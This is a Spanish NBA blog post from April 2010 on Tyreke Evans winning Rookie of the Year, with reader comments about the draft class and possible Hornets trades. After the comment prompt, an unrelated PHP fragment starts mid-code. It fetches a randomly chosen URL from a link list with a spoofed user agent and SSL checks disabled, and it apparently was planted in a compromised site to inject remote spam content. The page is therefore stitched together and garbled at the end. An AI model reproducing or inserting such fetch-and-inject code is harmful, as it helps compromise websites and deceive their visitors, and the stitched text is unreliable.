Tyreke Evans se lleva el ROY

30 de April de 2010 por txusma

Posiblemente era el premio con más incertidumbre de todos los que se han otorgado o se van a otorgar esta temporada. El gran inicio de temporada de Brandon Jennings y el gran final de campaña de Stephen Curry provocaba que algunos pusieran en duda el favoritismo de Tyreke Evans, ganado justamente durante toda la temporada. Finalmente la lucha ha estado entre Evans y Curry, ganada por el primero gracias a los 20 votos más conseguidos en primera posición. El base de los Bucks ha quedado en tercer lugar y Darren Collison, en cuarto, consiguiendo increíblemente un voto como mejor rookie del año (Esto tan solo pueden ser ganas de llamar la atención).

Tras ser escogido con el número 4 del draft por los Kings, Evans se ha convertido en en el cuarto rookie de la historia tras Oscar Robertson, Michael Jordan y Lebron James en promediar más de 20 puntos, más de 5 rebotes y más de 5 asistencias, unos números fuera del alcance de la mayoría de los veteranos a los que ha añadido 1.5 robos por partido. Además fue nombrado MVP del partido de Rookies vs Sophomores del All Stars y consiguió un triple doble el 10 de Marzo frente a Toronto.

Una vez acabada la temporada es momento de reflexionar sobre todos los análisis que daban a esta generación como una de las más pobres de los últimos años. Gente como Evans, Curry y Jennings han demostrado poder ser en un futuro no muy lejano auténticas estrellas de la liga y además ha llegado a la liga un buen número de jugadores a los que se les ve un buen futuro (Collison, Thorton, Harden, Gibson , Flynn, Blair, Ibaka, Lawson, Jebreko, Beaubois…). Y aún no ha debutado el número 1 del draft, Blake Griffin, ni nuestro Ricky Rubio…

Comenta

14 comentarios a esta entrada

  1. Rompe dice:
    #1

    De aquí a unos años diremos que fue uno de los mejores drafts de la historia… O no xD. Pero como evolucionen un poco, para estrellas perfectamente pueden ir Evans, Jennings, Curry, Collison, Blair o Thorton, más todos los secundarios de lujo que vienen por detrás…

      Citar

  2. Txusma dice:
    #2

    La conclusión es que esto del draft es pura lotería?

      Citar

  3. LEmontus dice:
    #3

    Primero decir que obviamente no estoy de acuerdo en la elección de evans como Roy, aunque sea el mejor la mejor temporada es para BJ3.

    Yo también pienso que este draft puede ser muy importante y marcar una época.

    Sobre todo por sus bases Evans Jennings Curry Collinson y Thorthon pintan para estrellas de las buenas si no lo han sido ya en esta temporada(sobre todo Evans y Jennings). Además habrá que ver a Blair,Gibson,Lawson y Hardem. Y especial atención a lo que pueda hacer beaubois que me da que va a ser importante en la liga.

      Citar

  4. Vader dice:
    #4

    Pues yo si que estoy de acuerdo con el RoY para Evans. El 20-5-5 lo dice todo y ademas fue el rookie que más pronto se erigio en lider de su franquicia con toda la presión que esto conlleva. Ademas, ha diferencia de otros rookies, no le recuerdo bajones importantes de rendimiento. Ha sido muy regular.

    Y ciertamente este draft ha sido mucho mejor de lo esperado. No abro mucho el abanico de posibles estrellas de la liga, pero si para estos cuatro; Evans, Curry, Jennings y Griffin si físicamente vuelve al 100%.

    Saludos

      Citar

  5. sergio dice:
    #5

    Muy habil Txus… xD

      Citar

  6. sergio dice:
    #6

    Me gustaría saber que porcentaje de números 1 del draft ha sido Rookie del año. Griffin puede competir el año que viene por el premio no?? Creo que a Oden lo tuvieron en cuenta el año pasado…

      Citar

  7. LEmontus dice:
    #7

    Si Grifiin cuenta como rookie el año que viene y opta al roy. Evans tuvo un bajón al princicipio en los primeros 6,7 partidos.

      Citar

  8. Uno cualquiera dice:
    #8

    17 de los 57 galardones (casi un 30%) han ido a parar a manos de un número 1 del draft. De esos 17, uno fue compartido (Elton Brand (nº1) lo compartió con Steve Francis (nº 2) en la temporada 99-00). Además, como curiosidad, David Robinson ganó el ROY del 89-90 siendo la primera elección del Draft del año 87 (ya sabéis el tema de la Marina), algo parecido a lo que puede hacer Blake Griffin el año que viene o a lo que pudo hacer Oden.

    Fuente:

    http://en.wikipedia.org/wiki/NBA_Rookie_of_the_Year_Award

      Citar

  9. Viva_Dirk dice:
    #9

    Yo si estoy deacuerdo con le premio aunque me jode porque aposté por Jennings con una cuota de 88 a 1 y he estado a punto de llevame 166 dólares.

    Creo que es muy pronto para asegurar que Collison o Curry van a ser estrellas, y ojo que Curry me encanta pero por su físico y tipo de juego dependerá de que entrenadores le toquen para que sea una estrella o no.

      Citar

  10. TheDeerHunter dice:
    #10

    wow Viva… muy buen ojo con esa apuesta
    no te la has llevado, pero era un bombazo de cuota

      Citar

  11. LEmontus dice:
    #11

    Aunque me duela yo veo a collinson ejor que curry y jennings, con menos características pero lo que sabe hacer lo hace a la perefección. Está claro que es una análisis sin mucho fundamento porque no se le ha visto mucho, pero no creo que me equivoque. (Y mira que jennings me gusta desde siempre porque por casualidades de la vida vi un video suyo en oak y ya vi en él un base influyente en la NBA.

    Lo mejor de Jennings es esa sonrisa de jugón y lo que eso conlleva, mentalidad de una estrella.

      Citar

  12. Rompe dice:
    #12

    La verdad es que Collison hizo lo que creo que no ha hecho un rookie nunca… jugar en lugar de una de las estrellas del la NBA y parecer la propia estrella!

      Citar

  13. Txusma dice:
    #13

    Y una vez visto el tema Collison y con la temporada tan flojita de los Hornets, os plantearíais cambios gordos si fueseis el GM de New Orleans?

      Citar

  14. kantonyo dice:
    #14

    Lo de Hornets es para un artículo entero. Tiene un backcourt fantastico con Paul, Collison y Thornton, incluso Devin Brown puede valer como reserva. En el poste alto, el fichaje de Okafor no ha tenido al final el resultado deseado, se ha podido comprobar que ofensivamente es un pívot con pocos recursos, pero en cambio sigue siendo un gran defensor y dominante en el rebote. David West es una alapívot válido, sobre todo teniendo en cuenta que no van a encontrar algo mejor por 9M$. Lo que falta claramente es un alero. El sueldo de Stojakovic son 15M$, todo un lastre, y no acaba contrato hasta el año 2011. James Posey, este año no ha servido ni para defender. En un partido en concreto de PO podría ser útil, pero no para una Regular Season. Morris Peterson, igual, sus 6M$ están muy por encima de lo que aporta. Entre los tres aleros suman casi 28M$.

    A mi parecer tienen tres opciones para crecer:

    1) La más dificil: Intentar colar a los tres alero en varios traspasos y traerse un alero en condiciones.

    2) La más dolorosa: Desprenderse de Collison o Paul, e intentar buscar ese alero que apuntale la plantilla. Por Chris Paul (13M$) una buena opción es traerse a Danny Granger (10M$) más Earl Watson (3M$). Por Collison (1,2M$), tiene más dificil buscar ese alero de prestigio y que tengan potencial parecido a Collison. Un quinteto Collison, Thornton, Granger, West y Okafor, no suena nada mal.

    3) La más factible: Esperar el Draft y que haya suerte. En este momento son 11º. Hay varios aleros que pueden llegar a ser muy imporantes en la NBA. Wesley Johnson es un top5, Aminu (muy verde) será un top 10, Gordon Hayward top 15, Paul George (recuerda a Granger) un top 20, Motiejunas también podría jugar de alero.

    Por cierto el alapívot de Partizan no se presentará al draft. Quiere quedarse un año más en Belgrado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>